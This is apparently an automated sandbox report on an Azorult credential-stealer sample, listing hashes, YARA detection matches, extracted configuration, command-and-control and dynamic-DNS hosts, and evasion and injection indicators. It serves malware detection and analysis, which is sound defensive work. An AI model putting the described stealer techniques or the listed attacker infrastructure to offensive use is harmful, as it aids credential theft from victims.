Analysis Report hfLfKDTosA.exe

Overview

General Information

Sample Name: hfLfKDTosA.exe
Analysis ID: 361337
MD5: cf351c60783008409a564b31a5c38dd6
SHA1: 96f9fbed2b2c5ba5bc542223d6d8ca05fcb377ad
SHA256: 32bdc406f8f2c4f9133a41e9c6e1c56aaad679c36a797ac857334779822a723e
Tags: AZORult, exe

Detection

Azorult
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Azorult
Yara detected Azorult Info Stealer
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Startup

  • System is w10x64
  • hfLfKDTosA.exe (PID: 7100 cmdline: 'C:\Users\user\Desktop\hfLfKDTosA.exe' MD5: CF351C60783008409A564B31A5C38DD6)
    • hfLfKDTosA.exe (PID: 4400 cmdline: C:\Users\user\Desktop\hfLfKDTosA.exe MD5: CF351C60783008409A564B31A5C38DD6)
    • hfLfKDTosA.exe (PID: 6420 cmdline: C:\Users\user\Desktop\hfLfKDTosA.exe MD5: CF351C60783008409A564B31A5C38DD6)
  • cleanup

Malware Configuration

Threatname: Azorult

{"config: ": ["MachineID :", "EXE_PATH  :", "Computer(Username) :", "Screen:", "Layouts:", "LocalTime:", "Zone:", "[Soft]", "Host: www.realmadrid.com\r"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security |
00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp | Azorult | detect Azorult in memory | JPCERT/CC Incident Response Group |
  • 0x17b08:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x18168:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x33f28:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x34588:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x4ff48:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x505a8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x19850:$v2: http://ip-api.com/json
  • 0x35c70:$v2: http://ip-api.com/json
  • 0x51c90:$v2: http://ip-api.com/json
  • 0x184c2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
  • 0x348e2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
  • 0x50902:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security |
00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.hfLfKDTosA.exe.400000.0.raw.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security |
6.2.hfLfKDTosA.exe.400000.0.raw.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
6.2.hfLfKDTosA.exe.400000.0.raw.unpack | Azorult_1 | Azorult Payload | kevoreilly |
  • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 ...
  • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
6.2.hfLfKDTosA.exe.400000.0.raw.unpack | Azorult | detect Azorult in memory | JPCERT/CC Incident Response Group |
  • 0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x1a360:$v2: http://ip-api.com/json
  • 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
6.2.hfLfKDTosA.exe.400000.0.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: hfLfKDTosA.exe.7100.2.memstr, Malware Configuration Extractor: Azorult {"config: ": ["MachineID :", "EXE_PATH :", "Computer(Username) :", "Screen:", "Layouts:", "LocalTime:", "Zone:", "[Soft]", "Host: www.realmadrid.com\r"]}
Multi AV Scanner detection for submitted file
Source: hfLfKDTosA.exe, Virustotal: Detection: 22%
Source: hfLfKDTosA.exe, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\hfLfKDTosA.exe, Code function: 6_2_004094C4 CryptUnprotectData,LocalFree,6_2_004094C4

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown, HTTPS traffic detected: 99.86.159.29:443 -> 192.168.2.6:49732 version: TLS 1.0
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: hfLfKDTosA.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\hfLfKDTosA.exe, Code function: 6_2_0041303C FindFirstFileW,FindNextFileW,FindClose,6_2_0041303C
Source: C:\Users\user\Desktop\hfLfKDTosA.exe, Code function: 6_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,6_2_004111C4
Source: C:\Users\user\Desktop\hfLfKDTosA.exe, Code function: 6_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,6_2_00414408
Source: C:\Users\user\Desktop\hfLfKDTosA.exe, Code function: 6_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,6_2_00412D70
Source: C:\Users\user\Desktop\hfLfKDTosA.exe, Code function: 6_2_0041158C FindFirstFileW,FindNextFileW,FindClose,6_2_0041158C
Source: C:\Users\user\Desktop\hfLfKDTosA.exe, Code function: 6_2_00411590 FindFirstFileW,FindNextFileW,FindClose,6_2_00411590
Source: C:\Users\user\Desktop\hfLfKDTosA.exe, Code function: 6_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,6_2_00412D9C

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: Host: www.realmadrid.com
Uses dynamic DNS services
Source: unknown, DNS query: name: busch.duckdns.org
Source: Joe Sandbox View, IP Address: 151.101.2.133
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown, HTTPS traffic detected: 99.86.159.29:443 -> 192.168.2.6:49732 version: TLS 1.0
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 User-Agent: Other Host: www.chelseafc.com Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /base/2930AD689ACFCD5F8337A7469C74A7E8.html HTTP/1.1 User-Agent: Other Host: 0k10dk21kkeok2e.online Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 User-Agent: Other Host: www.liverpoolfc.com Connection: Keep-Alive
Source: unknown, DNS traffic detected: queries for: www.chelseafc.com
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://uk.joiebaby.com/liverpoolfc/
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://uk.tigerwit.com/about/liverpool
                Source: hfLfKDTosA.exe, 00000006.00000002.372036082.0000000000EE8000.00000004.00000020.sdmpString found in binary or memory: https://watson.telemet
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.acronis.com/en-gb/
                Source: hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpString found in binary or memory: https://www.axa.com/?utm_source=liverpoolfc&amp;utm_medium=logo-partnership&amp;utm_campaign=lfc1819
                Source: hfLfKDTosA.exe, 00000002.00000002.373988549.0000000002F66000.00000004.00000001.sdmpString found in binary or memory: https://www.chelseafc.com
                Source: hfLfKDTosA.exeString found in binary or memory: https://www.digicert.com/CPS0
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.easports.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.expedia.co.uk/
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M54566
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.hcltech.com/unitedbyhcl
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.hollyfrontier.com/home/default.aspx
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.levi.com/GB/en_GB/
                Source: hfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com
                Source: hfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/first-team/fixtures-and-results
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/membership
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/my-lfc/join/user-details?user_type=free
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/my-lfc/login?fragment=&amp;referer=http://www.liverpoolfc.com
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/my-lfc/login?fragment=&amp;referer=http://www.liverpoolfc.com/video
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/tickets
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com
                Source: hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com/base/SPEqtpfdsaeFqgTZQsvyOXtjwhRSmtsPkVJcLGxKDbMLBpaXNarFtbHlhWinkfNKnAglkXf
                Source: hfLfKDTosA.exe, 00000002.00000002.373988549.0000000002F66000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.373988549.0000000002F66000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Accessibility
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Privacy-Policy
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/help/club-contacts?int_source=manutd.com&amp;int_medium=menu&amp;int_campa
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/partners/global/marriott-hotels
                Source: hfLfKDTosA.exe, 00000002.00000002.373988549.0000000002F66000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com4
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.mitel.com/learn/case-studies/liverpool-football-club
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.mondelezinternational.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpString found in binary or memory: https://www.nike.com/gb/
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.quorn.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com
                Source: hfLfKDTosA.exe, 00000002.00000002.374071777.0000000002FC2000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com/base/SPEqtpfdsaeFqgTZQsvyOXtjwhRSmtsPkVJcLGxKDbMLBpaXNarFtbHlhWinkfNKnAgl
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.snapchat.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpString found in binary or memory: https://www.tourism-mauritius.mu
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.twitter.com/realmadrid
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/manutd
                Source: hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/realmadrid
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443

                System Summary:

                Malicious sample detected (through community Yara rule)
                Source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
                Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
                Source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
                Source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 2_2_0141D0042_2_0141D004
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 2_2_0141B1842_2_0141B184
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 2_2_0141F4702_2_0141F470
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: String function: 00403B98 appears 44 times
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: String function: 00404E64 appears 33 times
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: String function: 00404E3C appears 87 times
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: String function: 004062D8 appears 34 times
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: String function: 004034E4 appears 36 times
                Source: hfLfKDTosA.exeStatic PE information: invalid certificate
                Source: hfLfKDTosA.exe, 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKtfR FXH.exe2 vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000002.00000002.378765813.00000000062F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000002.00000002.373950117.0000000002F31000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000002.00000002.379142574.00000000069B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHIT.dll* vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000002.00000000.328537776.0000000000AA6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameget_EditedFormattedValue.exeR vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000005.00000002.366293367.00000000003D6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameget_EditedFormattedValue.exeR vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exeBinary or memory string: OriginalFilename vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameKtfR FXH.exe2 vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exe, 00000006.00000002.371712175.00000000007E6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameget_EditedFormattedValue.exeR vs hfLfKDTosA.exe
                Source: hfLfKDTosA.exeBinary or memory string: OriginalFilenameget_EditedFormattedValue.exeR vs hfLfKDTosA.exe
                Source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: classification engine Classification label: mal92.troj.spyw.winEXE@5/4@23/4
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe File created: C:\Users\user\AppData\Local\BbgzvTZwbLOGmSg
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7A741079-B8DA4441-FDF68348
                Source: hfLfKDTosA.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: hfLfKDTosA.exe Virustotal: Detection: 22%
                Source: hfLfKDTosA.exe ReversingLabs: Detection: 20%
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe File read: C:\Users\user\Desktop\hfLfKDTosA.exe:Zone.Identifier
                Source: unknown Process created: C:\Users\user\Desktop\hfLfKDTosA.exe 'C:\Users\user\Desktop\hfLfKDTosA.exe'
                Source: unknown Process created: C:\Users\user\Desktop\hfLfKDTosA.exe C:\Users\user\Desktop\hfLfKDTosA.exe
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Process created: C:\Users\user\Desktop\hfLfKDTosA.exe C:\Users\user\Desktop\hfLfKDTosA.exe
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: hfLfKDTosA.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: hfLfKDTosA.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                Binary contains a suspicious time stamp
                Source: initial sampleStatic PE information: 0xFABC5879 [Sun Apr 22 01:10:17 2103 UTC]
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00418124 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,socket,gethostbyname,htons,connect,send,closesocket,6_2_00418124
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040D86E push 0040D89Ch; ret 6_2_0040D894
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040D870 push 0040D89Ch; ret 6_2_0040D894
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_004140C0 push 004140ECh; ret 6_2_004140E4
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_004108C8 push 004108F4h; ret 6_2_004108EC
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040B0F7 push 0040B124h; ret 6_2_0040B11C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040B0F8 push 0040B124h; ret 6_2_0040B11C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00408080 push 004080B8h; ret 6_2_004080B0
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00408158 push 00408196h; ret 6_2_0040818E
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00408970 push 004089E4h; ret 6_2_004089DC
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00408994 push 004089E4h; ret 6_2_004089DC
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_004089AC push 004089E4h; ret 6_2_004089DC
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00415208 push 0041528Ch; ret 6_2_00415284
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040CA0C push 0040CA3Ch; ret 6_2_0040CA34
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040CA10 push 0040CA3Ch; ret 6_2_0040CA34
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00417AEC push 00417B18h; ret 6_2_00417B10
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00404BC0 push 00404C11h; ret 6_2_00404C09
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040D3C0 push 0040D3ECh; ret 6_2_0040D3E4
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040A3E4 push 0040A410h; ret 6_2_0040A408
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040C390 push 0040C3C0h; ret 6_2_0040C3B8
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040C394 push 0040C3C0h; ret 6_2_0040C3B8
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040A3AC push 0040A3D8h; ret 6_2_0040A3D0
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040DC44 push 0040DCA3h; ret 6_2_0040DC9B
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040DC0C push 0040DC38h; ret 6_2_0040DC30
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0041B417 push ecx; iretd 6_2_0041B427
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040B41E push 0040B44Ch; ret 6_2_0040B444
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040B420 push 0040B44Ch; ret 6_2_0040B444
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0040A438 push 0040A464h; ret 6_2_0040A45C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0041A4F4 push 0041A51Ah; ret 6_2_0041A512
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00414C80 push 00414CACh; ret 6_2_00414CA4
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00409488 push 004094B8h; ret 6_2_004094B0
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0041A4AC push 0041A4E8h; ret 6_2_0041A4E0
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_00417B1A
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe TID: 956 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe TID: 2916 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe TID: 7140 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0041303C FindFirstFileW,FindNextFileW,FindClose,6_2_0041303C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,6_2_004111C4
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,6_2_00414408
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,6_2_00412D70
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_0041158C FindFirstFileW,FindNextFileW,FindClose,6_2_0041158C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00411590 FindFirstFileW,FindNextFileW,FindClose,6_2_00411590
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,6_2_00412D9C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exeCode function: 6_2_00416740 GetSystemInfo,6_2_00416740
                Source: hfLfKDTosA.exe, 00000002.00000002.378337606.0000000005E70000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWX
                Source: hfLfKDTosA.exe, 00000002.00000002.378765813.00000000062F0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: hfLfKDTosA.exe, 00000002.00000002.378482424.0000000005F1C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                Source: hfLfKDTosA.exe, 00000002.00000002.378765813.00000000062F0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
